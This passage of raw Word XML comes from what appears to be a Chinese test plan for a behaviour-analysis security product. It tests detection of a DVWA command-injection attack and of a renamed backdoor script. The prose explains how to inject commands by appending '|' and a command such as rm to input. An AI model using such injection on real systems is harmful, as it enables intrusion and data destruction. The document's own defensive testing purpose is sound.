                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1F57D4A1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="473"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B085E6"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630DB14D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0784EF6C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E1A7ED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="297" w:name="_Toc2110711278"/>
      <w:bookmarkStart w:id="298" w:name="_Toc36487930"/>
      <w:r w:rsidRPr="00536672">
        <w:t>漏洞攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
      <w:bookmarkEnd w:id="298"/>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73B452D8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F3F096"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61617AE3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>漏洞利用攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="47286A78" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67DB1663" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF6BFC9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用默认安装DVWA作为模拟漏洞服务，以期作为攻击目标进行漏洞利用攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B2FFE70" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74895F5F"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551CC149" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6F2DCE4F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B40DE44"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529B866F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：漏洞攻击属于常规攻防手段中</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>最</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>核心的手段之一了，其利用手法和危害结果因不同的漏洞而不同，不同于暴力破解攻击的简单，经济</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>缺有效</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的性质（大多只能对非专业目标或疏忽大意的对象产生效果），漏洞利用攻击常常应对的目标是有价值对象或普遍的互联网用户，互联网上各种重大影响的攻击事件的核心往往源于此处。就今年热点事件</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>warncry“勒索病毒的大规模扩散就是基于一个window的0day漏洞引发。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33811EDA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>漏洞攻击往往基于挖掘出的各类漏洞，发送精心构造的输入数据进而触发漏洞，而引发的结果可能有数据泄露，任意代码/命令执行，拒绝服务等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B895274" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>其中危害最大的一类攻击应该属于任意命令执行，通过触发漏洞实现远程执行任意命令进而窃取到系统的相关权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E2D345C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="073E8FF5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>具体测试过程：在被保护机器上部署含有漏洞的服务（DVWA），之后通过漏洞服务基于远程任意命令行漏洞进行攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06255804" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>调整dvwa安全级别，设置成low以确保漏洞能够简单利用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AE32CB"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drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3950CBC6" wp14:editId="6BA631F6">
                  <wp:extent cx="4104005" cy="1359535"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="12065"/>
                  <wp:docPr id="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37"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1359535"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DF8F6D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="299" w:name="_Toc794349060"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>安全级别设置</w:t>
            </w:r>
            <w:bookmarkEnd w:id="299"/>
          </w:p>
          <w:p w14:paraId="058E4834" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>利用其中的</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>命令行任意执行漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进行攻击，如下测试攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E74B341"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="61D78BB3" wp14:editId="25172A12">
                  <wp:extent cx="4104005" cy="2581910"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="889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38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2581910"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0D9F94" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="300" w:name="_Toc1897129244"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>任意命令行漏洞测试攻击</w:t>
            </w:r>
            <w:bookmarkEnd w:id="300"/>
          </w:p>
          <w:p w14:paraId="0BAFB7E0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>上述的abc为无效的操作指令，替换成其他任意的字符串都行，“|”后面的字符串命令则是对应的攻击指令，可以替换成对应任意的攻击指令，如ls，rm，cp等（需要相应的权限）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="152DA1DE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B50A6E8"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701FF602"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="45406D7F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A76DEF"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3C312AB6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53B571C2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DA0A65" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="_Toc1604140877"/>
      <w:bookmarkStart w:id="302" w:name="_Toc36487931"/>
      <w:r w:rsidRPr="00536672">
        <w:t>未知软件/行为/脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="301"/>
      <w:bookmarkEnd w:id="302"/>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18F69028" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31CDCC9D"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3F2F69B1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>未知软件/行为/脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3C80031C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="460514BD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF97811" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用提供的测试脚本作为未知脚本进行测试（在后门测试中提供）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="70B19F77" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16042855"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388C1295" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="79F097B0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="693F810E"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4446D46C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：一台正常运行的服务器，只要给出最近足量的数据，其中就能包含当前机器中所有运行时态正常执行的各类程序，脚本，网络连接等</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C500102" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在极端情况下，因内外部威胁原因，攻击者在获取到相关shell权限后，需要执行新的未知的攻击程序/网络连接/脚本等，用户行为分析能够通过之前基于数据服务程序建模结果对未知的软件/行为/脚本进行告警。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54439865" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试过程：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="403A3F78" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用在后门攻击演示中的测试攻击脚本，若此脚本已经能够触发未知软件告警，首先在用户行为分析 Web页面中进行误报标记，并进行提升训练。（同时演示误报标记和提升训练功能）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A1C433" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>重命名backdoor.sh成unknowattack.sh，并执行，以触发告警（能够使用</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>任意新</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的第三</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>方程序演示此</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>功能，二进制执行程序和脚本皆可）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="189A5EFF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DF83FDD"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57B6BDC0"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
